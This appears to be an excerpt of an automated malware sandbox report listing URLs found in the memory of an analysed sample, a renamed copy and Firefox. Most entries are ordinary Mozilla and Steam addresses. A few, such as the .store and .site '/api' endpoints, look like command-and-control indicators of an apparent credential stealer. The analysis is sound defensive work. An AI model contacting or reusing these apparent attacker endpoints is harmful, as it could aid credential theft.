Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96961E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C96946F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96967B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C96941D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2129414948.000001C9633E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963424000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96349E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96965D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F251000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2126645860.000001C962BF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2156687679.000001C967303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-in
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96349E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/UrlbarProviderQuick
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001D.00000002.2303891585.000001C96F739000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 0000001D.00000002.2300171636.000001C96F54B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984164128.000001C966D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985500280.000001C966F60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984524321.000001C966F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985862608.000001C966F7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985118386.000001C966F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C967798000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C96944B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2192132128.000001C96875C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2277444887.000001C96F03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001D.00000002.2126645860.000001C962BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C9679BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E09000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2229257788.000001C968F51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F286000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 0000001D.00000002.2122168164.000001C957211000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.s
Source: 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bathdoomgaz.store:443/api?
Source: file.exe, 00000000.00000003.1460412273.000000000598E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962AAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: file.exe, 00000000.00000003.1460412273.000000000598E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962AAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: firefox.exe, 0000001D.00000002.2277444887.000001C96F0B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001D.00000002.2277444887.000001C96F0B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001D.00000002.2277444887.000001C96F0B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001D.00000002.2277444887.000001C96F0B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/p
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site:443/apii
Source: file.exe, 00000000.00000003.1474200360.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.c
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloF
Source: file.exe, 00000000.00000003.1459148229.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1477555129.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1446807409.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431421560.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1474200360.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steams
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public.
Source: file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/communitp
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812396686.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&amp;l=e
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&amp;
Source: 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/prof(s
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812396686.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812396686.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812396686.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=W9BX
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812396686.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englis
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
